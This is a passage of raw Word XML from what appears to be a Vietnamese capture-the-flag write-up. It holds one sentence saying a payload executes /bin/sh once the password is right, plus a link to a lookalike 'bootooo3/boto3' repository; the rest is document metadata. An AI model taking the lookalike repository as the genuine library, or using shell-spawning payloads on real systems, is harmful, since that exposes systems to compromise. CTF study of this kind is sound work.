        <w:t>Khi mật khẩu chính xác, payload thực thi /bin/sh. Đây đồng thời là flag của challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDAAEDB" w14:textId="77777777" w:rsidR="00501760" w:rsidRDefault="00501760" w:rsidP="00501760"/>
    <w:p w14:paraId="734955AF" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760"/>
    <w:p w14:paraId="61B71FB5" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760"/>
    <w:p w14:paraId="29737E56" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="00A6154C" w:rsidRDefault="007C5184" w:rsidP="007C5184"/>
    <w:p w14:paraId="09321F9D" w14:textId="13C45436" w:rsidR="00C71B06" w:rsidRPr="00B70DDB" w:rsidRDefault="00C71B06" w:rsidP="00C71B06"/>
    <w:sectPr w:rsidR="00C71B06" w:rsidRPr="00B70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776"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF0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0B3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3C4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74110"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="767E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B19E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E63E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F0BB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EF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A3057"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D3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729598">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1402871996">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="628979331">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="607590948">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1929725873">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="112791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B6"/>
    <w:rsid w:val="00190A0E"/>
    <w:rsid w:val="00191F7F"/>
    <w:rsid w:val="0019491C"/>
    <w:rsid w:val="001D46CA"/>
    <w:rsid w:val="002057BC"/>
    <w:rsid w:val="00245BB6"/>
    <w:rsid w:val="002C7479"/>
    <w:rsid w:val="00326F60"/>
    <w:rsid w:val="00396CA3"/>
    <w:rsid w:val="003E5679"/>
    <w:rsid w:val="00501760"/>
    <w:rsid w:val="005B1BA3"/>
    <w:rsid w:val="007C5184"/>
    <w:rsid w:val="008579A2"/>
    <w:rsid w:val="00861125"/>
    <w:rsid w:val="008800F1"/>
    <w:rsid w:val="00A35380"/>
    <w:rsid w:val="00A6154C"/>
    <w:rsid w:val="00B70DDB"/>
    <w:rsid w:val="00B772CE"/>
    <w:rsid w:val="00C71B06"/>
    <w:rsid w:val="00E273B7"/>
    <w:rsid w:val="00ED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8F96"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A3109789-FC2D-4D74-A01D-2159CE2A3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B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0DD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61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github.com/bootooo3/boto3.git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30</Pages>
  <Words>3845</Words>
  <Characters>21919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Dương</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Trần Minh Dương</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-12T17:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-12T19:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>